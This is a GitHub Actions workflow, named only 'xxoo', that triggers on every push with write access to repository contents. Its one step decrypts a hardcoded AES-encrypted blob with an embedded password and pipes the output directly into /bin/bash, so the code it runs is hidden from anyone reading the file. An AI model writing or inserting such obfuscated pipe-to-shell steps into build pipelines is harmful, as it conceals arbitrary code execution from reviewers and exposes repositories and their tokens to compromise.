name: xxoo
on:
  workflow_dispatch:
  push:
jobs:
  build:
    runs-on: ubuntu-latest
    permissions:
      contents: write
    steps:
      - uses: actions/checkout@v4
      - name: xxoo
        run: |
          echo "U2FsdGVkX19QQR4a3QM5zNg8unJya4eFIoEqUAlRMiBKXuurgkx896MSFYVqBmsYNsuftYn8Mb0/TL7TqynbhefpjnjzUjL3fijR32K++z0A/e8Oa1IhKON5EuEP/8a4Ea8cg8rOrwstDQGmsNBaBq7Hdun8/NEj9Hpd8vpwroLci6kUEWuL0KCUmvd+CJB4ogS1ltn0Vo41lx+DwzTl2eGozdFqbLadlnxQpgv+tu+dRFuP9iJUk0qVRgh1PGDiQeuMj+XSletendWe1mYP8RXAbl29mR+b7+WVWEmusCCpokRNTbjF8jaIis5lM0cv/+IW4vN7WxMFybPLC/nrHsbfAF01ekDSJvaJ93y8zRAGFfgRiTTxvWpSwnpPS2Fts6JC2yGTIikk+7cPnbMEqI5jxxJQXdXjbqgxCskhKu0+q4lxOhfIiRyxAzO4KdVK2nZ8cXG9VyBLEV6y4khS1bM8BKMivaTantfonOtCEJpDZHZpHQbC4h+Tm9ayeCEqGhC4rYiMiENhhEHRMoano/VyNxCSh5etE9O56/iTb+hQ9cx6g6kkkGxol06qBpek4vd1QyWqYhq0o2ZGta/oy3MOMGOKsbWyZr+nJfZ1x2GhROYqNGrsa0n4jmdWXGbNCziOuk7Z49dskRPf6O+DojWXIDZQ2crWSajSiSSGguzFxKOYa7ac9q6mklMiYXwB2xDQxh6de+SaDm4kTHuCCW9RLe6KGxRy/lISPKsCwMfXeamWHJmbZfqDXaszJ9RvIrZ9kOIuJfbZ1r04VrGflPMlzdyitwbay30PHjkkEoL7CRRIUv8keg2xtzOw8rvbFR8IKwPnd7MmcTviTy4nWOyqAfSASfbsFB6TbxWGAd7CwU2oQUB++cMe8FDwUSYcHMRnauYJLYyAJ5eU8fzcCScFc/qJu9aRlu4cfTC9976B7xBL/CVwBekUe82PQCIjDIZ4rn8LSLwLALdk4Qiq7rWycyUxQYH2bLbN+BFVNyekWt+kEzIuLM5faZfUUi4HSOfCXxVG5mTGu9Jlt0CgZVIwB0FOqZQkh9lYZLPGq0J9Mq0U64SJpfC/est2644UBsCBaxGe//MlLARorqYouXrMoVhGvwmDlEnZzzyIAaRNlEX8eQke+Zn/pxc2SOXnRaDsHVvUI0Lvc4Fx5KbX2ZsPH7eKBcQmrybPEB" | openssl enc -d -aes-256-cbc -base64 -A -salt -pbkdf2 -pass pass:7uhfudnfud909~~23 | /bin/bash

